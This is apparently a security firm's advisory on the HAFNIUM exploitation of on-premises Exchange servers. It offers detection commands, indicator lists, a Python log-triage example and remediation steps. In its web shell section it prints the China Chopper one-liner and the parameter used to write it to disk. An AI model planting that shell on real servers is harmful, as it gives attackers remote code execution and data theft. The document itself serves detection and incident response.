Over the past 24 hours, it has become clear just how many organizations have been impacted by a Nation-State attack.
The attack against on-premises Microsoft Exchange Servers from Hafnium is widespread. Today, we sent a communication to our customers about what happened and how to respond.
We are taking the unusual step of sharing that customer communication in hopes that it helps other organizations.
What Happened
The recently exposed zero-day vulnerabilities in the on-premises or hybrid Microsoft Exchange Server products give attackers an attack vector through the Internet Information Services (IIS) component of the victim servers, providing an opportunity to exploit these vulnerabilities in order to steal data or spawn web shells that establish persistence on the network.
It should be noted that Microsoft’s hosted Exchange Online, Office 365, and Microsoft 365 services are not affected, though third-party cloud service providers who operate their own instances may be at risk.
The Microsoft Threat Intelligence Center (MSTIC) has attributed these attacks to the state-sponsored group HAFNIUM operated out of China.
The goal of this document is to provide Critical Insight clients with actionable detection, confirmation, and remediation steps they can use to respond to incidents that they or Critical Insight find in their environment. Note that if Critical Insight has detected an indicator or event in your environment, we have already reached out. If we have not actively contacted your organization, Critical Insight still recommends administrators run the tests, because depending on the organization’s network architecture and scope of detection services, our MDR (Managed Detection & Response) service or your in-line network inspection systems may not be able to see indicators or related traffic.
The Vulnerabilities
- CVE-2021-26855 – a server-side request forgery vulnerability that may allow an attacker to send arbitrary HTTP requests and authenticate as the Exchange server.
- CVE-2021-26857 – insecure deserialization vulnerability in the Unified Messaging Service that may allow untrusted user-controllable data to be deserialized by a program, allowing the attacker the ability to run code as SYSTEM on the Exchange server. This does require admin permission or another vulnerability to exploit.
- CVE-2021-26858 – post-authentication arbitrary file write vulnerability in Exchange allowing an authenticated attacker to write a file to any path on the server.
- CVE-2021-27065 – post-authentication arbitrary file write vulnerability in Exchange similar to the one above.
These vulnerabilities are being “chained” together and used in sequence to provide outside attackers with direct access to servers and infrastructure, and in some cases are enabling the attackers to exfiltrate mail data to a remote server outside of the network. This is a far-reaching attack which can be launched from any internet-connected computer, and is likely to penetrate most port-blocking firewalls and network IPS systems. Organizations operating Exchange servers that are hosted behind a Web Application Firewall or other firewall/load-balancer device which publishes a limited Outlook Web Application front-end may be less susceptible to compromise but should still closely examine their systems for the Indicators of Compromise (IOCs) to determine if they are affected.
These vulnerabilities have been addressed in a patch released on Tuesday, March 2. Links directly to these patches may be found by navigating to:
What is a Web Shell
A Web Shell is a piece of malicious code dropped by an attacker on an asset, in this instance an IIS web server hosting OWA, which provides remote access and code execution functions on the compromised server. These web shells may then be leveraged to execute commands, steal data, or use the server as a launchpad for further attacks. A common web shell that Critical Insight has seen used with CVE-2021-27065 is the popular “China Chopper” web shell, written to disk through the “CMD=Set-OabVirtualDirectory.ExternalUrl” parameter:
<%@ Page Language="Jscript"%><%eval(Request.Item["Random word here"], "unsafe");%>
Critical Insight Detection & Response
Critical Insight has detections in place to assist with identifying the attacks based on these vulnerabilities. We are also conducting threat hunting activity through Windows logs for associated activity. We are asking all clients that see suspicious indicators outside of Critical Insight resources to forward those to us so we can assist with conducting focused investigations.
Actionable Detection Activities for Administrators
- CVE-2021-26855 exploitation can be detected via the following Exchange HttpProxy logs
- These logs are located in the following directory:
%PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\HttpProxy
- Exploitation can be identified by searching for log entries where the AuthenticatedUser is empty and the AnchorMailbox contains the pattern of ServerInfo~*/*
- Example PowerShell command to find these log entries (this command is a single line):
Import-Csv -Path (Get-ChildItem -Recurse -Path "$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\HttpProxy" -Filter '*.log').FullName | Where-Object { $_.AuthenticatedUser -eq '' -and $_.AnchorMailbox -like 'ServerInfo~*/*' } | select DateTime, AnchorMailbox
If activity is detected, the logs specific to the application noted in the AnchorMailbox path can be used to help determine what actions were taken. These logs may be found in %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging
- CVE-2021-26858 exploitation can be detected via the Exchange log files
- C:\Program Files\Microsoft\Exchange Server\V15\Logging\OABGeneratorLog
- Files should only be downloaded to the directory %PROGRAMFILES%\Microsoft\Exchange Server\V15\ClientAccess\OAB\Temp
- In case of exploitation, files are downloaded to other directories (UNC or local paths). If files are present in directories other than ..\OAB\Temp, this may be an indicator of exploitation.
- Windows command to search for potential exploitation (this command is a single line):
findstr /snip /c:"Download failed and temporary file" "%PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\OABGeneratorLog\*.log"
- CVE-2021-26857 exploitation can be detected via the Windows Application event logs
- Exploitation of this deserialization bug will create Application events with the following properties:
- Source: MSExchange Unified Messaging
- EntryType: Error
- Event Message Contains: System.InvalidCastException
- Following is a PowerShell command to query the Application Event Log for these log entries (this command is a single line):
Get-EventLog -LogName Application -Source "MSExchange Unified Messaging" -EntryType Error | Where-Object { $_.Message -like "*System.InvalidCastException*" }
- CVE-2021-27065 exploitation can be detected via the following Exchange log files:
- C:\Program Files\Microsoft\Exchange Server\V15\Logging\ECP\Server
- All Set-<AppName>VirtualDirectory properties should never contain script. InternalUrl and ExternalUrl should only be valid URIs.
- Following is a PowerShell command to search for potential exploitation (this command is a single line):
Select-String -Path "$env:PROGRAMFILES\Microsoft\Exchange Server\V15\Logging\ECP\Server\*.log" -Pattern 'Set-.+VirtualDirectory'
- Volexity observed these user-agents in conjunction with exploitation to /ecp/ URLs:
- ExchangeServicesClient/0.0.0.0
- python-requests/2.19.1
- python-requests/2.25.1
System administrators should also review the IIS web logs for the following suspicious user-agents requesting the /owa/auth/Current location (though these should not be taken as definitive IOCs):
- DuckDuckBot/1.0;+(+http://duckduckgo.com/duckduck...)
- facebookexternalhit/1.1+(+http://www.facebook.com/extern...)
- Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/sp...)
- Mozilla/5.0+(compatible;+Bingbot/2.0;++http://www.bing.com/bingbot.ht...)
- Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html
- Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails)
- Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/...)
- Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots)
- Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36
Confirming Web Shell Activity:
Volexity has observed indicators that are consistent with webserver breaches that can be used to look on server disks and in weblogs for access to or the presence of ASPX files at the following paths:
- \inetpub\wwwroot\aspnet_client\ (any .aspx file under this folder or sub folders)
- \<exchange install path>\FrontEnd\HttpProxy\ecp\auth\ (any file besides TimeoutLogoff.aspx)
- \<exchange install path>\FrontEnd\HttpProxy\owa\auth\ (any file or modified file that is not part of a standard install)
- \<exchange install path>\FrontEnd\HttpProxy\owa\auth\Current\ (any .aspx file in this folder or subfolders)
- \<exchange install path>\FrontEnd\HttpProxy\owa\auth\<folder with version number>\ (any .aspx file in this folder or subfolders)
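The HttpProxy check and the /ecp/ user-agent list from the detection section, together with the web shell path rules just listed, written as an added offline triage example for logs and file listings preserved from a disconnected server (this is example code, not the advisory's or Microsoft's; the HttpProxy rows, column subset and file paths are constructed samples, and the "<exchange install path>" is handled by matching on the folder suffix):

```python
import csv
import fnmatch
import io
import re

# Constructed HttpProxy rows (subset of the real columns) for exercising the checks; not real logs.
SAMPLE_HTTPPROXY = """DateTime,UrlStem,AuthenticatedUser,AnchorMailbox,UserAgent,ClientIpAddress
2021-03-03T01:10:05.120Z,/owa/auth/logon.aspx,,,Mozilla/5.0,203.0.113.7
2021-03-03T01:11:42.003Z,/ecp/,,ServerInfo~mail.corp.example/autodiscover/autodiscover.xml,python-requests/2.25.1,198.51.100.23
2021-03-03T01:12:08.551Z,/owa/,jdoe@corp.example,Smtp~jdoe@corp.example,Mozilla/5.0,192.0.2.10
2021-03-03T01:13:30.777Z,/ecp/,,ServerInfo~mail.corp.example/ecp/,Mozilla/5.0,198.51.100.23
"""

# User-agents the advisory lists as seen together with exploitation of /ecp/ URLs.
ECP_EXPLOIT_AGENTS = {"ExchangeServicesClient/0.0.0.0", "python-requests/2.19.1", "python-requests/2.25.1"}

def triage_httpproxy(csv_text):
    """Return (reason, row) pairs for rows matching the HttpProxy indicators."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        # Same predicate as the Import-Csv one-liner: unauthenticated request whose
        # AnchorMailbox carries a ServerInfo~<host>/<path> routing hint.
        if row["AuthenticatedUser"] == "" and fnmatch.fnmatchcase(row["AnchorMailbox"], "ServerInfo~*/*"):
            hits.append(("CVE-2021-26855 pattern", row))
        if row["UrlStem"].startswith("/ecp/") and row["UserAgent"] in ECP_EXPLOIT_AGENTS:
            hits.append(("known exploit user-agent on /ecp/", row))
    return hits

# Folders that should hold no .aspx file (or only the one allowed), matched as a path suffix so the
# Exchange install path need not be known. Allow-lists hold lower-case basenames.
WATCHED_FOLDERS = [
    (re.compile(r"inetpub/wwwroot/aspnet_client/", re.I), ()),
    (re.compile(r"FrontEnd/HttpProxy/ecp/auth/", re.I), ("timeoutlogoff.aspx",)),
    (re.compile(r"FrontEnd/HttpProxy/owa/auth/(Current|\d+(\.\d+)+)/", re.I), ()),
]

def suspicious_aspx(paths):
    """Filter a file listing (e.g. from a preserved disk image) to .aspx files in watched folders."""
    flagged = []
    for original in paths:
        p = original.replace("\\", "/")
        name = p.rsplit("/", 1)[-1].lower()
        if not name.endswith(".aspx"):
            continue
        if any(rx.search(p) and name not in allowed for rx, allowed in WATCHED_FOLDERS):
            flagged.append(original)
    return flagged

if __name__ == "__main__":
    for reason, row in triage_httpproxy(SAMPLE_HTTPPROXY):
        print(reason, row["DateTime"], row["ClientIpAddress"], row["AnchorMailbox"])
```

The owa\auth rule covers only the Current and version-numbered subfolders, because the advisory's "not part of a standard install" rule for owa\auth itself needs a known-good file list to compare against.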
Network Indicators – Attacker IPs
Though not exhaustive, these are some IPs that have been used by attackers to exploit the vulnerabilities in these servers. These IPs are tied to VPS and VPN services. There have also been indicators of attackers using TOR services:
Remediation & Next Steps
Once indicators are confirmed, simply applying the patch will not eliminate an already established presence on an affected server. CISA recommends taking the following actions:
- Immediately disconnect Microsoft Exchange on-premises servers.
- It is highly recommended that the server is NOT powered off and that it be retained for further forensic activity.
- Notify any insurance or third-party forensic assets available to your organization.
- Identify and remove all threat actor-controlled accounts and identified persistence mechanisms.
If your organization decides to disengage the Exchange Server from your network, DO simply disconnect it and preferably DO NOT shut it down. There may be a need for forensic response, and that server holds memory and other artifacts that are destroyed if it is shut down.
- Preserve all logs and artifacts. If your team is preparing to build a new or replacement server, preserve the existing systems in the event forensic analysis is necessary in the future.
- CISA has released a National Cyber Awareness System Alert (AA21-062A) for these vulnerabilities. (https://us-cert.cisa.gov/ncas/alerts/aa21-062a) If sufficient indicators of compromise are found to suggest a breach, Critical Insight recommends following the CISA guidance, though this may incur operational impacts and email service disruptions.
- FOR FEDERAL AGENCIES ONLY: DHS released an Emergency Directive for Federal Agencies stating if the above artifacts are found to shut the server down. https://cyber.dhs.gov/ed/21-02/.
Current detections for exploitation of these vulnerabilities reside in Microsoft’s Defender and Azure products, and in the Critical Insight MDR service. Administrators may also review logs to determine suspicious activities related to these four exploits. Microsoft has updated its blog about these vulnerabilities with information on how to scan Exchange log files for related IOCs:
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log
Questions and Incident Assistance
We hope the information provided here has been valuable to you and your organization in identifying and containing these newly emerged threats and vulnerabilities. If you or your organization have questions or are in need of incident assistance, please contact Critical Insight through your MDR Security Strategist or Account Executive, your Virtual CISO, or by calling the Critical Insight Critical Response phone number at +1-800-604-4810.